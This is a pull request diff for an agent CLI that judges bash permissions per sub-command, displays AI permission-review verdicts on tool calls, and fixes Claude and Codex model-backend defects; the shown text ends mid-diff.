### PR TITLE
[Enhancement] Judge bash permissions per sub-command, surface the AI review, and fix three model-backend defects

### DIFF
--- a/conf/agent.yml.example
+++ b/conf/agent.yml.example
@@ -105,6 +105,9 @@ agent:
   #   # is trimmed to fit ``max_history_bytes`` (the planned action itself is
   #   # never trimmed), and too small a ``max_completion_tokens`` truncates the
   #   # structured verdict, which fails closed into a manual prompt.
+  #   # Every reviewed call reports its verdict on the tool call in the CLI
+  #   # ("AI review ✓ passed · low risk · conf 0.92 · <rationale>"), including
+  #   # ones the reviewer auto-allowed; ctrl+o shows the full rationale.
   #   # auto_review:
   #   #   enabled: true
   #   #   model: openai/gpt-5-mini

--- a/conf/agent.yml.example
+++ b/conf/agent.yml.example
@@ -123,15 +123,18 @@ agent:
   #   # omitted). Pattern syntax — no colon = exact command; "prefix:*" =
   #   # prefix match; "prefix:glob" = prefix + first-argument glob. Decision
   #   # order: deny (also matches wrapped commands like ``xargs rm``) →
-  #   # safety ceiling (bash -c / sudo / && / $() / redirection never auto-allow
-  #   # statically) → ask → allow → default (ask). A PURE pipeline (``a | b | c``)
-  #   # is judged per segment: it auto-runs only if every segment is allowed, and
-  #   # any denied segment blocks the whole pipeline. A safety-ceiling ASK is
-  #   # still eligible for ``auto_review`` above, which reads the full command
-  #   # text; only unparseable commands always require a person. Safety-ceiling
-  #   # asks are never offered as project-level grants. The confirmation prompt
-  #   # offers once / session / project scopes; "project" appends the prefix
-  #   # to ``.datus/config.yml``'s ``bash_allow`` list.
+  #   # safety ceiling (bash -c / sudo / $() / redirection / background & /
+  #   # loops & subshells never auto-allow statically) → ask → allow →
+  #   # default (ask). A command chained with ``|``, ``&&``, ``||`` or ``;`` is
+  #   # judged per sub-command: it auto-runs only if every sub-command is
+  #   # allowed, and any denied sub-command blocks the whole chain. A
+  #   # safety-ceiling ASK is still eligible for ``auto_review`` above, which
+  #   # reads the full command text; only unparseable commands always require a
+  #   # person, and safety-ceiling asks are never offered as project grants.
+  #   # The confirmation prompt lists every sub-command that needs approval and
+  #   # offers once / session / project scopes; "project" appends one prefix PER
+  #   # sub-command to ``.datus/config.yml``'s ``bash_allow`` list, so
+  #   # re-running the same chain later does not prompt again.
   #   # bash_commands:
   #   #   allow:
   #   #     - "git status"            # exact: not "git status --short"

--- a/conf/providers.yml
+++ b/conf/providers.yml
@@ -35,6 +35,8 @@ providers:
       - claude-sonnet-4-6
       - claude-opus-4-6
       - claude-opus-4-7
+      - claude-sonnet-5
+      - claude-opus-5
 
   kimi:
     type: kimi
@@ -312,6 +314,18 @@ model_specs:
     max_tokens: 8192
 
   # Claude Models
+  # The claude-*-5 family rejects ``temperature`` outright
+  # ("`temperature` is deprecated for this model."), so it must never be sent —
+  # not even the non-reasoning default. Verified against claude-sonnet-5 and
+  # claude-opus-5; the 4.x models below still accept it.
+  claude-sonnet-5:
+    context_length: 1000000
+    max_tokens: 128000
+    supports_temperature: false
+  claude-opus-5:
+    context_length: 1000000
+    max_tokens: 128000
+    supports_temperature: false
   claude-opus-4-7:
     context_length: 1000000
     max_tokens: 128000

--- a/conf/providers.yml
+++ b/conf/providers.yml
@@ -314,18 +314,16 @@ model_specs:
     max_tokens: 8192
 
   # Claude Models
-  # The claude-*-5 family rejects ``temperature`` outright
-  # ("`temperature` is deprecated for this model."), so it must never be sent —
-  # not even the non-reasoning default. Verified against claude-sonnet-5 and
-  # claude-opus-5; the 4.x models below still accept it.
+  # ``temperature`` / ``top_p`` are never sent to Anthropic at all (see the
+  # provider gate in ``OpenAICompatibleModel._build_completion_params``), so no
+  # per-model flag is needed here — the claude-*-5 family rejects temperature
+  # outright and the 4.x family rejects it alongside top_p.
   claude-sonnet-5:
     context_length: 1000000
     max_tokens: 128000
-    supports_temperature: false
   claude-opus-5:
     context_length: 1000000
     max_tokens: 128000
-    supports_temperature: false
   claude-opus-4-7:
     context_length: 1000000
     max_tokens: 128000

--- a/conf/providers.yml
+++ b/conf/providers.yml
@@ -314,10 +314,12 @@ model_specs:
     max_tokens: 8192
 
   # Claude Models
-  # ``temperature`` / ``top_p`` are never sent to Anthropic at all (see the
-  # provider gate in ``OpenAICompatibleModel._build_completion_params``), so no
-  # per-model flag is needed here — the claude-*-5 family rejects temperature
-  # outright and the 4.x family rejects it alongside top_p.
+  # ``temperature`` / ``top_p`` are never sent to Anthropic at all — the
+  # provider gate is ``OpenAICompatibleModel._suppresses_sampling_params``,
+  # consulted by both request paths (``generate`` for completions and
+  # ``_build_agent`` for tool/streaming calls) — so no per-model flag is needed
+  # here: the claude-*-5 family rejects temperature outright and the 4.x family
+  # rejects it alongside top_p.
   claude-sonnet-5:
     context_length: 1000000
     max_tokens: 128000

--- a/datus/cli/action_display/renderers.py
+++ b/datus/cli/action_display/renderers.py
@@ -555,6 +555,11 @@ class ActionRenderer:
             result: List[Text] = [
                 Text.from_markup(f"[dim]  \u23bf  \U0001f527 {label} - {tc.status_mark}{tc.duration_str}[/dim]")
             ]
+            # A reviewed sub-agent call carries the same verdict row as a
+            # main-agent one: without it a subagent could run a gated bash/SQL
+            # action and show only the result, hiding that a review happened.
+            if tc.review_line:
+                result.append(Text.from_markup(f"[dim]          {rich_escape(tc.review_line)}[/dim]"))
             if verbose:
                 for line in tc.args_lines:
                     result.append(Text.from_markup(f"[dim]          {line}[/dim]"))
@@ -794,10 +799,19 @@ class ActionRenderer:
         # Manual SQL/bash execution (input-bar sql>/bash> mode): render the
         # terminal frame as the styled execution block.
         if action.action_type == "manual_exec":
+            from datus.cli.action_display.tool_content import format_review_line
             from datus.cli.manual_exec import render_exec_block
+            from datus.tools.permission.review_registry import PERMISSION_REVIEW_OUTPUT_KEY
 
-            payload = action.output.get("payload") if isinstance(action.output, dict) else None
-            return [render_exec_block(payload)] if payload else []
+            output = action.output if isinstance(action.output, dict) else {}
+            payload = output.get("payload")
+            if not payload:
+                return []
+            # ``bash_mode`` stamps the verdict onto this action's output; render
+            # it inside the block so a manually run command shows what
+            # authorised it, exactly like an agent-run tool call does.
+            review_line = format_review_line(output.get(PERMISSION_REVIEW_OUTPUT_KEY), verbose=verbose)
+            return [render_exec_block(payload, review_line=review_line)]
 
         # Task tool -> render as subagent
         if action.role == ActionRole.TOOL:

--- a/datus/cli/action_display/renderers.py
+++ b/datus/cli/action_display/renderers.py
@@ -855,6 +855,9 @@ class ActionRenderer:
             result: List[Union[Text, Markdown, Syntax]] = [
                 Text.from_markup(f"\u23fa \U0001f527 {rich_escape(tc.label)} - {tc.status_mark}{tc.duration_str}")
             ]
+            if tc.review_line:
+                # Verbose carries the untruncated rationale.
+                result.append(Text.from_markup(f"    [dim]{rich_escape(tc.review_line)}[/dim]"))
             for line in tc.args_lines:
                 result.append(Text.from_markup(f"    {line}"))
             if tc.args_lines and tc.output_lines:
@@ -877,12 +880,17 @@ class ActionRenderer:
             dur = tc.duration_str.strip()  # "(<0.1s)" or "(12.4s)"
             dur_suffix = f" \u00b7 [dim]{dur.strip('()')}[/dim]" if dur else ""
 
+            # The AI permission review (when the call was reviewed) gets its own
+            # row above the result, so the verdict that authorised the run reads
+            # in the same block as what the run produced.
+            review_rows = [f"  \u2514\u2500 [dim]{rich_escape(tc.review_line)}[/dim]"] if tc.review_line else []
+
             # Multi-line compact result (e.g. bash showing the first few output
             # lines). Continuation rows align under the first line's content; an
             # overflow row folds the remainder claude-style.
             if tc.compact_result_lines:
                 first, *rest = tc.compact_result_lines
-                body_lines = [f"  \u2514\u2500 {mark} {rich_escape(first)}{dur_suffix}"]
+                body_lines = review_rows + [f"  \u2514\u2500 {mark} {rich_escape(first)}{dur_suffix}"]
                 body_lines.extend(f"     {rich_escape(line)}" for line in rest)
                 if tc.compact_result_overflow > 0:
                     body_lines.append(f"     [dim]\u2026 +{tc.compact_result_overflow} lines (ctrl+o to expand)[/dim]")
@@ -894,6 +902,7 @@ class ActionRenderer:
                 body = f"  \u2514\u2500 {mark} {rich_escape(result_text)}{dur_suffix}"
             else:
                 body = f"  \u2514\u2500 {mark}{dur_suffix}"
+            body = "\n".join(review_rows + [body])
             return [Text.from_markup(f"{status_dot} {header}\n{body}")]
 
     @staticmethod

--- a/datus/cli/action_display/tool_content.py
+++ b/datus/cli/action_display/tool_content.py
@@ -126,11 +126,14 @@ def _truncate_middle(text: str, max_len: int = 60) -> str:
     return flat[:keep] + " ... " + flat[-keep:]
 
 
-# Compact-mode budget for the rationale tail of the review line. The verdict
-# prefix is short and fixed-width-ish, so this keeps the whole row near the
-# other compact result rows; the untruncated rationale stays available in
-# verbose mode (ctrl+o).
-_REVIEW_RATIONALE_MAX = 96
+# Compact-mode budget for the rationale tail of the review line, matching the
+# budget the reviewer's system prompt asks for. The verdict prefix costs 46
+# columns ("  └─ AI review ✓ passed · low risk · conf 0.97"), so 70 keeps the
+# whole row inside a 120-column terminal instead of wrapping. A compliant
+# rationale therefore renders in full; only a model that ignored the budget gets
+# the middle-truncation marker, which doubles as the signal that it did. The
+# untruncated text stays available in verbose mode (ctrl+o).
+_REVIEW_RATIONALE_MAX = 70
 
 
 def format_review_line(review: Optional[dict], *, verbose: bool = False) -> str:

--- a/datus/cli/action_display/tool_content.py
+++ b/datus/cli/action_display/tool_content.py
@@ -18,6 +18,7 @@ from typing import Callable, Dict, List, Optional
 
 from datus.schemas.action_history import ActionHistory, ActionStatus
 from datus.schemas.tool_summary import TOOL_SUMMARY_REGISTRY, search_table_result_counts
+from datus.tools.permission.review_registry import PERMISSION_REVIEW_OUTPUT_KEY
 from datus.utils.loggings import get_logger
 from datus.utils.tool_archive import is_archived_output, parse_archived_marker
 
@@ -47,6 +48,10 @@ class ToolCallContent:
     # path (unchanged for every other tool).
     compact_result_lines: List[str] = field(default_factory=list)
     compact_result_overflow: int = 0  # extra lines beyond those shown
+    # One-line AI permission-review summary drawn above the result row(s), e.g.
+    # "AI review ✓ passed · low risk · conf 0.92 · <rationale>". Empty when the
+    # call was never reviewed (review disabled, or statically allowed/denied).
+    review_line: str = ""
 
 
 # Type alias for custom content builder functions
@@ -119,6 +124,48 @@ def _truncate_middle(text: str, max_len: int = 60) -> str:
         return flat
     keep = max(1, (max_len - 5) // 2)
     return flat[:keep] + " ... " + flat[-keep:]
+
+
+# Compact-mode budget for the rationale tail of the review line. The verdict
+# prefix is short and fixed-width-ish, so this keeps the whole row near the
+# other compact result rows; the untruncated rationale stays available in
+# verbose mode (ctrl+o).
+_REVIEW_RATIONALE_MAX = 96
+
+
+def format_review_line(review: Optional[dict], *, verbose: bool = False) -> str:
+    """One-line summary of an AI permission review, or "" when there is none.
+
+    Shape: ``AI review ✓ passed · low risk · conf 0.92 · <rationale>``.
+
+    ``outcome`` distinguishes a review the model resolved on its own from one a
+    person overrode, so an approved-despite-flagged run is not shown as if the
+    reviewer had waved it through.
+    """
+    if not isinstance(review, dict) or not review:
+        return ""
+    outcome = review.get("outcome", "")
+    decision = review.get("decision", "")
+    if decision == "unavailable":
+        head = "AI review ? unavailable"
+    elif decision == "allow":
+        head = "AI review ✓ passed"
+    else:
+        head = "AI review ✗ flagged"
+
+    parts = [head]
+    risk = review.get("risk_level")
+    if risk:
+        parts.append(f"{risk} risk")
+    confidence = review.get("confidence")
+    if isinstance(confidence, (int, float)):
+        parts.append(f"conf {confidence:.2f}")
+    if outcome == "user_approved":
+        parts.append("user approved")
+    rationale = _collapse_whitespace(str(review.get("rationale", "")))
+    if rationale:
+        parts.append(rationale if verbose else _truncate_middle(rationale, _REVIEW_RATIONALE_MAX))
+    return " · ".join(parts)
 
 
 def _format_positional(args: dict, *keys: str, max_len: int = 60) -> str:
@@ -2213,6 +2260,11 @@ class ToolCallContentBuilder:
             tc = self._registry[function_name](action, verbose)
         else:
             tc = self._build_default(action, verbose)
+
+        # Filled centrally rather than per-tool: any gated call (bash,
+        # execute_sql, and anything the gate reviews later) gets the same row.
+        if isinstance(action.output, dict):
+            tc.review_line = format_review_line(action.output.get(PERMISSION_REVIEW_OUTPUT_KEY), verbose=verbose)
 
         if not verbose:
             # Populate compact-layout fields if the per-tool builder skipped them.

--- a/datus/cli/bash_mode.py
+++ b/datus/cli/bash_mode.py
@@ -24,6 +24,7 @@ import asyncio
 import inspect
 import json
 import time
+from contextvars import ContextVar
 from typing import TYPE_CHECKING, Any, AsyncGenerator, Callable, Dict, List, Optional
 
 from pydantic import BaseModel
@@ -31,8 +32,15 @@ from rich.console import Console
 
 from datus.cli.execution_state import InteractionBroker, InteractionCancelled, merge_interaction_stream
 from datus.schemas.action_history import ActionHistory, ActionRole, ActionStatus
+from datus.tools.permission import review_registry
 from datus.utils.exceptions import DatusException, ErrorCode
 from datus.utils.loggings import get_logger
+
+# Call id of the manual-exec frame currently being rendered, so the permission
+# gate's context shims can key an AI-review verdict the same way the SDK keys a
+# real tool call. ``_run_with_live_frame`` mints the id before invoking the gate;
+# without a frame there is no action to annotate and this stays ``None``.
+_manual_exec_call_id: "ContextVar[Optional[str]]" = ContextVar("datus_manual_exec_call_id", default=None)
 
 if TYPE_CHECKING:
     from datus.cli.repl import DatusCLI
@@ -45,13 +53,16 @@ logger = get_logger(__name__)
 class _BashContextShim:
     """Minimal stand-in for the SDK ``RunContextWrapper``.
 
-    ``PermissionHooks`` reads only ``context.tool_arguments`` (via
-    ``_parse_tool_args``, which accepts a JSON string or a dict).
+    ``PermissionHooks`` reads ``context.tool_arguments`` (via
+    ``_parse_tool_args``, which accepts a JSON string or a dict) and
+    ``context.tool_call_id`` (to key an AI-review verdict onto the resulting
+    tool action).
     """
 
     def __init__(self, command: str) -> None:
         self.tool_arguments = json.dumps({"command": command})
         self.direct_user_invocation = True
+        self.tool_call_id = _manual_exec_call_id.get()
 
 
 class _BashToolStub:
@@ -66,6 +77,7 @@ class _SqlContextShim:
     def __init__(self, sql: str) -> None:
         self.tool_arguments = json.dumps({"sql": sql})
         self.direct_user_invocation = True
+        self.tool_call_id = _manual_exec_call_id.get()
 
 
 class _SqlToolStub:
@@ -83,6 +95,7 @@ class _ToolContextShim:
     def __init__(self, args: Dict[str, Any]) -> None:
         self.tool_arguments = json.dumps(args)
         self.direct_user_invocation = True
+        self.tool_call_id = _manual_exec_call_id.get()
 
 
 class _ToolStub:
@@ -639,11 +652,15 @@ def _run_with_live_frame(cli: "DatusCLI", kind: str, command: str, work: Callabl
 
     payload = None
     dispatch = False
+    token = _manual_exec_call_id.set(call_id)
     with ctx:
         try:
             payload, dispatch = work()
         finally:
+            _manual_exec_call_id.reset(token)
             status = ActionStatus.SUCCESS if (payload and payload.get("success")) else ActionStatus.FAILED
+            # Bash mode builds its actions directly instead of going through
+            # ActionHistoryManager, so the review annotation is stamped here.
             actions.append(
                 ActionHistory(
                     action_id=f"complete_{call_id}",
@@ -651,7 +668,7 @@ def _run_with_live_frame(cli: "DatusCLI", kind: str, command: str, work: Callabl
                     action_type=MANUAL_EXEC_ACTION_TYPE,
                     messages=f"{kind}> {command}",
                     input={"kind": kind, "command": command},
-                    output={"payload": payload},
+                    output=review_registry.stamp({"payload": payload}, call_id),
                     status=status,
                     start_time=start,
                     end_time=datetime.now(),

--- a/datus/cli/manual_exec.py
+++ b/datus/cli/manual_exec.py
@@ -362,7 +362,7 @@ def _sql_result_table(payload: Dict[str, Any]) -> Optional[Table]:
     return table
 
 
-def render_exec_block(payload: Dict[str, Any]) -> RenderableType:
+def render_exec_block(payload: Dict[str, Any], *, review_line: str = "") -> RenderableType:
     """Render a manual-execution payload as a bordered, mode-coloured block.
 
     Used identically by the live chat turn and the ``/resume`` transcript, so
@@ -374,10 +374,18 @@ def render_exec_block(payload: Dict[str, Any]) -> RenderableType:
     command line, the result (table / output), and a ✓/✗ status footer with
     timing. The content keeps its normal background so the SQL table and the
     syntax-highlighted command stay legible.
+
+    ``review_line`` is the pre-formatted AI permission-review summary for the
+    call (empty when it was never reviewed). It is passed in rather than read
+    off the payload because the formatter lives in ``action_display``, which
+    this module must not import — and because the payload doubles as the chat
+    message sent to the model, which has no business seeing the verdict.
     """
     kind = payload["kind"]
     _, _, border_style = _KIND_CHROME[kind]
     body: List[RenderableType] = [_command_renderable(payload)]
+    if review_line:
+        body.append(Text(review_line, style="dim"))
 
     if kind == "sql":
         table = _sql_result_table(payload)

--- a/datus/conf/providers.yml
+++ b/datus/conf/providers.yml
@@ -35,6 +35,8 @@ providers:
       - claude-sonnet-4-6
       - claude-opus-4-6
       - claude-opus-4-7
+      - claude-sonnet-5
+      - claude-opus-5
 
   kimi:
     type: kimi
@@ -312,6 +314,18 @@ model_specs:
     max_tokens: 8192
 
   # Claude Models
+  # The claude-*-5 family rejects ``temperature`` outright
+  # ("`temperature` is deprecated for this model."), so it must never be sent —
+  # not even the non-reasoning default. Verified against claude-sonnet-5 and
+  # claude-opus-5; the 4.x models below still accept it.
+  claude-sonnet-5:
+    context_length: 1000000
+    max_tokens: 128000
+    supports_temperature: false
+  claude-opus-5:
+    context_length: 1000000
+    max_tokens: 128000
+    supports_temperature: false
   claude-opus-4-7:
     context_length: 1000000
     max_tokens: 128000

--- a/datus/conf/providers.yml
+++ b/datus/conf/providers.yml
@@ -314,18 +314,16 @@ model_specs:
     max_tokens: 8192
 
   # Claude Models
-  # The claude-*-5 family rejects ``temperature`` outright
-  # ("`temperature` is deprecated for this model."), so it must never be sent —
-  # not even the non-reasoning default. Verified against claude-sonnet-5 and
-  # claude-opus-5; the 4.x models below still accept it.
+  # ``temperature`` / ``top_p`` are never sent to Anthropic at all (see the
+  # provider gate in ``OpenAICompatibleModel._build_completion_params``), so no
+  # per-model flag is needed here — the claude-*-5 family rejects temperature
+  # outright and the 4.x family rejects it alongside top_p.
   claude-sonnet-5:
     context_length: 1000000
     max_tokens: 128000
-    supports_temperature: false
   claude-opus-5:
     context_length: 1000000
     max_tokens: 128000
-    supports_temperature: false
   claude-opus-4-7:
     context_length: 1000000
     max_tokens: 128000

--- a/datus/conf/providers.yml
+++ b/datus/conf/providers.yml
@@ -314,10 +314,12 @@ model_specs:
     max_tokens: 8192
 
   # Claude Models
-  # ``temperature`` / ``top_p`` are never sent to Anthropic at all (see the
-  # provider gate in ``OpenAICompatibleModel._build_completion_params``), so no
-  # per-model flag is needed here — the claude-*-5 family rejects temperature
-  # outright and the 4.x family rejects it alongside top_p.
+  # ``temperature`` / ``top_p`` are never sent to Anthropic at all — the
+  # provider gate is ``OpenAICompatibleModel._suppresses_sampling_params``,
+  # consulted by both request paths (``generate`` for completions and
+  # ``_build_agent`` for tool/streaming calls) — so no per-model flag is needed
+  # here: the claude-*-5 family rejects temperature outright and the 4.x family
+  # rejects it alongside top_p.
   claude-sonnet-5:
     context_length: 1000000
     max_tokens: 128000

--- a/datus/models/claude_model.py
+++ b/datus/models/claude_model.py
@@ -650,9 +650,23 @@ class ClaudeModel(OpenAICompatibleModel):
                 # its own default.
             )
 
-            if response.content:
-                return response.content[0].text
-            return ""
+            # A thinking-capable model answers with ``[ThinkingBlock,
+            # TextBlock, ...]`` — thinking first. On this path that is the
+            # normal shape, not an edge case: OAuth subscription tokens force
+            # ``use_native_api`` and the client carries
+            # ``interleaved-thinking-2025-05-14`` (see ``OAUTH_BETA_HEADERS``),
+            # so the server may emit thinking whether or not the caller asked
+            # for it — ``enable_thinking`` is not forwarded here at all.
+            # ``content[0].text`` therefore raised ``'BetaThinkingBlock' object
+            # has no attribute 'text'`` and threw away a complete answer, which
+            # is how a working AI permission review surfaced as "unavailable".
+            # Join the text blocks and skip the rest (thinking,
+            # redacted_thinking, tool_use), matching the streaming path.
+            return "\n".join(
+                block.text
+                for block in response.content or []
+                if getattr(block, "type", None) == "text" and getattr(block, "text", None)
+            )
 
         except anthropic.AuthenticationError as e:
             self._diagnose_oauth_401(e)  # raises specific DatusException for OAuth tokens

--- a/datus/models/claude_model.py
+++ b/datus/models/claude_model.py
@@ -642,7 +642,12 @@ class ClaudeModel(OpenAICompatibleModel):
                 messages=filtered_messages,
                 system=self._build_system_param(system_message),
                 max_tokens=kwargs.get("max_tokens") or self.max_tokens() or 20480,
-                temperature=kwargs.get("temperature", anthropic.NOT_GIVEN),
+                # ``temperature`` is never forwarded to Anthropic — the
+                # claude-*-5 family rejects it outright ("`temperature` is
+                # deprecated for this model."), so honouring a caller's value
+                # would fail the request rather than tune it. Matches the
+                # provider gate in ``OpenAICompatibleModel``; Anthropic applies
+                # its own default.
             )
 
             if response.content:
@@ -838,7 +843,7 @@ class ClaudeModel(OpenAICompatibleModel):
                         messages=wrap_prompt_cache(messages),
                         tools=tools,
                         max_tokens=kwargs.get("max_tokens") or self.max_tokens() or 20480,
-                        temperature=kwargs.get("temperature", anthropic.NOT_GIVEN),
+                        # No ``temperature`` — see ``generate`` above.
                     )
                     generation_input = capture_native_trace_content("prompts", _anthropic_trace_input(request_kwargs))
                     active_generation_span = start_native_generation_span(

--- a/datus/models/codex_model.py
+++ b/datus/models/codex_model.py
@@ -310,14 +310,25 @@ class CodexModel(LLMBaseModel):
 
     @staticmethod
     def _consume_stream_text(stream) -> str:
-        """Consume a streaming response and return the full output text."""
+        """Consume a streaming response and return the full output text.
+
+        The terminal ``response.completed`` event is preferred when it actually
+        carries text, but it is NOT trusted blindly: against a ChatGPT-account
+        Codex endpoint that event arrives with ``output_text == ""`` and
+        ``output == []`` even after the model streamed a complete answer over
+        ``response.output_text.delta``. Returning the empty terminal value there
+        discarded the whole response — callers saw an empty string, and
+        ``generate_with_json_output`` turned that into a ``JSONDecodeError``
+        (surfaced as a bogus "HTTP 400"), so every structured call against such
+        an endpoint failed. Fall back to the accumulated deltas instead.
+        """
         collected = []
         for event in stream:
             event_type = getattr(event, "type", None)
             if event_type == "response.completed":
                 response = getattr(event, "response", None)
-                if response:
-                    return getattr(response, "output_text", "")
+                final_text = getattr(response, "output_text", "") if response else ""
+                return final_text or "".join(collected)
             elif event_type == "response.output_text.delta":
                 collected.append(getattr(event, "delta", ""))
         return "".join(collected)

--- a/datus/models/openai_compatible.py
+++ b/datus/models/openai_compatible.py
@@ -582,33 +582,30 @@ class OpenAICompatibleModel(LLMBaseModel):
             if self.default_headers:
                 params["extra_headers"] = self.default_headers
 
-            # Anthropic rejects requests carrying BOTH ``temperature`` and
-            # ``top_p`` with HTTP 400 / ``invalid_request_error`` (the
-            # claude-sonnet-4.x family enforces this strictly). The gate is
-            # the **routed** provider (``litellm_adapter.provider``), not the
-            # model class — operators may configure ``type=openai`` but a
-            # Claude model name, in which case ``LiteLLMAdapter`` auto-routes
-            # to Anthropic; the suppression must still apply or the request
-            # 400s. ``temperature`` wins (mirrors the historical
-            # ``ClaudeModel.generate`` contract); ``top_p`` is dropped
-            # unconditionally for Claude regardless of kwargs / model_config
-            # / non-reasoning default.
+            # Neither sampling knob is ever sent to Anthropic:
+            #   * ``top_p`` — rejected alongside ``temperature`` with HTTP 400 /
+            #     ``invalid_request_error`` (the claude-sonnet-4.x family
+            #     enforces this strictly).
+            #   * ``temperature`` — the claude-*-5 family rejects it outright
+            #     ("`temperature` is deprecated for this model."), which made
+            #     those models fail EVERY call. Gating on the family rather
+            #     than per-model spec means a newly released Claude model works
+            #     on day one instead of 400ing until the catalog catches up.
+            # The gate is the **routed** provider (``litellm_adapter.provider``),
+            # not the model class — operators may configure ``type=openai`` but a
+            # Claude model name, in which case ``LiteLLMAdapter`` auto-routes to
+            # Anthropic and the suppression must still apply.
+            # Suppression is unconditional, ahead of kwargs and model_config
+            # alike: no caller-supplied value can make such a request valid.
+            # Anthropic applies its own defaults for both.
             routed_provider = getattr(self.litellm_adapter, "provider", "")
-            suppress_top_p = routed_provider == LLMProvider.CLAUDE
-
-            # Some models reject ``temperature`` outright rather than merely
-            # constraining it (the claude-*-5 family: "`temperature` is
-            # deprecated for this model."). Suppression is unconditional there —
-            # ahead of kwargs and model_config alike — because no caller-supplied
-            # value can make such a request valid, and letting one through fails
-            # EVERY call to that model, not just the ones that opted in.
-            suppress_temperature = not self.supports_temperature()
+            suppress_sampling_params = routed_provider == LLMProvider.CLAUDE
+            suppress_top_p = suppress_sampling_params
 
             # Add temperature: priority is kwargs > model_config > default (0.7).
             # An explicit ``None`` in kwargs is the caller's "drop this param"
-            # signal — kept for symmetry with the top_p path even though
-            # Anthropic accepts ``temperature`` alone (where it accepts it).
-            if suppress_temperature:
+            # signal, kept symmetric with the top_p path.
+            if suppress_sampling_params:
                 pass
             elif "temperature" in kwargs:
                 if kwargs["temperature"] is not None:
@@ -1938,55 +1935,29 @@ class OpenAICompatibleModel(LLMBaseModel):
         """Model specifications loaded from conf/providers.yml (cached)."""
         return _load_model_specs()
 
-    def _lookup_spec_typed(self, field: str, expected_type: type) -> Optional[Any]:
+    def _lookup_spec(self, field: str) -> Optional[int]:
         """Look up ``field`` in ``model_specs`` with exact-then-longest-prefix matching.
 
         Longest-prefix is important when specs declare both a generic family key
         (e.g. ``gpt-5``) and a more specific variant (e.g. ``gpt-5.3-codex``): the
         generic key would otherwise bleed into unrelated slugs that happen to
-        share a short prefix. Returns None when the field is missing or is not
-        an ``expected_type`` — OpenRouter-cache-only entries do not carry
-        ``max_tokens``, so callers must tolerate absence.
-
-        ``expected_type`` keeps numeric specs and capability flags apart. It
-        matters in one direction only: ``bool`` is a subclass of ``int``, so a
-        flag would satisfy an ``int`` lookup, while a number never satisfies a
-        ``bool`` lookup.
+        share a short prefix. Returns None when the field is missing —
+        OpenRouter-cache-only entries do not carry ``max_tokens``, so callers
+        must tolerate absence.
         """
         specs = self.model_specs
-
-        def _typed(spec: Any) -> bool:
-            return isinstance(spec, dict) and isinstance(spec.get(field), expected_type)
-
         exact = specs.get(self.model_name)
-        if _typed(exact):
+        if isinstance(exact, dict) and isinstance(exact.get(field), int):
             return exact[field]
         best_key: Optional[str] = None
         for spec_model, spec in specs.items():
-            if not _typed(spec):
+            if not isinstance(spec, dict) or not isinstance(spec.get(field), int):
                 continue
             if self.model_name.startswith(spec_model) and (best_key is None or len(spec_model) > len(best_key)):
                 best_key = spec_model
         if best_key is None:
             return None
         return specs[best_key][field]
-
-    def _lookup_spec(self, field: str) -> Optional[int]:
-        """Numeric spec lookup (``max_tokens``, ``context_length``)."""
-        return self._lookup_spec_typed(field, int)
-
-    def supports_temperature(self) -> bool:
-        """Whether the model accepts a ``temperature`` parameter at all.
-
-        Newer Anthropic models (the claude-*-5 family) reject the request
-        outright with ``"`temperature` is deprecated for this model."``, so
-        sending the non-reasoning default of 0.7 made them unusable for every
-        call. Declared per model via ``model_specs.supports_temperature`` in
-        ``providers.yml``; absent means supported, which keeps every existing
-        model on its current behavior.
-        """
-        flag = self._lookup_spec_typed("supports_temperature", bool)
-        return True if flag is None else bool(flag)
 
     def max_tokens(self) -> Optional[int]:
         """Max tokens from model specs with prefix matching, or None if unavailable."""

--- a/datus/models/openai_compatible.py
+++ b/datus/models/openai_compatible.py
@@ -476,16 +476,19 @@ class OpenAICompatibleModel(LLMBaseModel):
                 else:
                     # Max retries reached or non-retryable error. Surface the
                     # upstream message verbatim — the wrapper code/desc is
-                    # often too generic (300002 = "Invalid request format,
-                    # content, or model response") and operators end up
-                    # grepping litellm tracebacks to figure out what really
-                    # broke. Keep ``str(e)`` on the same line so a single
-                    # CloudWatch entry has everything.
+                    # often too generic (300002 covers both a rejected request
+                    # and an unusable response) and operators end up grepping
+                    # litellm tracebacks to figure out what really broke. Keep
+                    # ``str(e)`` on the same line so a single CloudWatch entry
+                    # has everything, and carry it on the exception too: the
+                    # log is not visible to whoever catches this (the CLI
+                    # prints the exception message, and the permission
+                    # reviewer's fail-closed warning quotes it).
                     logger.error(
                         f"API error in {operation_name} after {attempt + 1} attempts: "
                         f"{error_code.code} - {error_code.desc}. upstream={e!s}"
                     )
-                    raise DatusException(error_code)
+                    raise DatusException(error_code, message_args={"error_detail": str(e)})
             except Exception as e:
                 logger.error(f"Unexpected error in {operation_name}: {str(e)}")
                 raise
@@ -535,14 +538,13 @@ class OpenAICompatibleModel(LLMBaseModel):
                     continue
                 else:
                     # Max retries reached or non-retryable error — same
-                    # reasoning as the sync ``_with_retry`` path: append
-                    # the upstream message so a single log line carries
-                    # both the wrapper classification and the raw cause.
+                    # reasoning as the sync ``_with_retry`` path: carry the
+                    # upstream message on both the log line and the exception.
                     logger.error(
                         f"API error in {operation_name} after {attempt + 1} attempts: "
                         f"{error_code.code} - {error_code.desc}. upstream={e!s}"
                     )
-                    raise DatusException(error_code)
+                    raise DatusException(error_code, message_args={"error_detail": str(e)})
             except Exception as e:
                 logger.error(f"Unexpected error in {operation_name}: {str(e)}")
                 raise
@@ -594,11 +596,21 @@ class OpenAICompatibleModel(LLMBaseModel):
             routed_provider = getattr(self.litellm_adapter, "provider", "")
             suppress_top_p = routed_provider == LLMProvider.CLAUDE
 
+            # Some models reject ``temperature`` outright rather than merely
+            # constraining it (the claude-*-5 family: "`temperature` is
+            # deprecated for this model."). Suppression is unconditional there —
+            # ahead of kwargs and model_config alike — because no caller-supplied
+            # value can make such a request valid, and letting one through fails
+            # EVERY call to that model, not just the ones that opted in.
+            suppress_temperature = not self.supports_temperature()
+
             # Add temperature: priority is kwargs > model_config > default (0.7).
             # An explicit ``None`` in kwargs is the caller's "drop this param"
             # signal — kept for symmetry with the top_p path even though
-            # Anthropic accepts ``temperature`` alone.
-            if "temperature" in kwargs:
+            # Anthropic accepts ``temperature`` alone (where it accepts it).
+            if suppress_temperature:
+                pass
+            elif "temperature" in kwargs:
                 if kwargs["temperature"] is not None:
                     params["temperature"] = kwargs["temperature"]
             elif self.model_config.temperature is not None:
@@ -1926,29 +1938,55 @@ class OpenAICompatibleModel(LLMBaseModel):
         """Model specifications loaded from conf/providers.yml (cached)."""
         return _load_model_specs()
 
-    def _lookup_spec(self, field: str) -> Optional[int]:
+    def _lookup_spec_typed(self, field: str, expected_type: type) -> Optional[Any]:
